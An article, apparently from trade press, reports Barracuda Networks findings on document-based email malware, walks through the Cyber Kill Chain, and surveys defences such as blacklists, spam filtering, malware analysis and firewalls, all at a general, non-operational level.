Barracuda Networks researchers have uncovered an alarming new rise in the use of document-based malware. A recent e-mail analysis revealed that 48% of all malicious files detected in the last 12 months were some kind of document. More than 300,000 unique malicious documents were identified.
Since the beginning of 2019, however, these types of document-based attacks have increased in frequency and dramatically so. In the first quarter of the year, 59% of all malicious files detected were documents compared to 41% in 2018.
Cyber criminals use e-mail to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website. Common types of malware include viruses, trojans, spyware, worms and ransomware.
After decades of relying on signature-based methods, which could only be effective at stopping a malware strain once a signature was derived from it, security companies now think about malware detection by asking the question: “What makes something malicious?” rather than: “How do I detect things I know are malicious?” The focus is on attempting to detect indicators that a file might do harm before it’s labelled as being harmful.
The Cyber Kill Chain
A common model used to better understand attacks is the Cyber Kill Chain, a seven-phase model of the steps most attackers take to breach a system:
*Reconnaissance: Target selection and research
*Weaponisation: Crafting the attack on the target, often using malware and/or exploits
*Delivery: Launching the attack
*Exploitation: Using exploits delivered in the attack package
*Installation: Creating persistence within the target’s system
*Command and Control: Using the persistence from outside the network
*Actions on objective: Achieving the objective that was the purpose of the attack (often exfiltration of data)
Most malware is sent as spam to widely-circulated e-mail lists that are sold, traded, aggregated and revised as they move through The Dark Web. Combo lists like those used in the ongoing sextortion scams are a good example of this sort of list aggregation and usage in action.
Now that the attacker has a list of potential victims, the malware campaign (ie the delivery phase of the Cyber Kill Chain) can commence, using social engineering to entice users to open an attached malicious document. Microsoft and Adobe file types are the most commonly used in document-based malware attacks, including Word, Excel, PowerPoint, Acrobat and PDF files.
Once the document is opened, either the malware is automatically installed or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks. The executable being downloaded and run when the malicious document is opened represents an installation phase in the Cyber Kill Chain.
Archive files and script files are the other two most common attachment-based distribution methods for malware. Attackers often play tricks with file extensions to try to confuse users and cajole them to open malicious documents.
Detection and blocking
Modern malware attacks are complex and layered, as are the solutions designed to detect and block them.
*Blacklists: With IP space becoming increasingly limited, spammers are using their own infrastructure. Often, the same IPs are used long enough for software to detect and blacklist them. Even with hacked sites and botnets, it’s possible to temporarily block attacks by IP once a large enough volume of spam has been detected.
*Spam filters/phishing detection systems: While many malicious e-mails appear convincing, spam filters, phishing detection systems and related security software can pick up subtle clues and help to block potentially threatening messages and attachments from reaching e-mail inboxes.
*Malware detection: For e-mails with malicious documents attached, both static and dynamic analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The URL for the executable can often be flagged using heuristics or threat intelligence systems. Obfuscation detected by static analysis can also indicate whether a document may be suspicious.
*Advanced firewall: If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.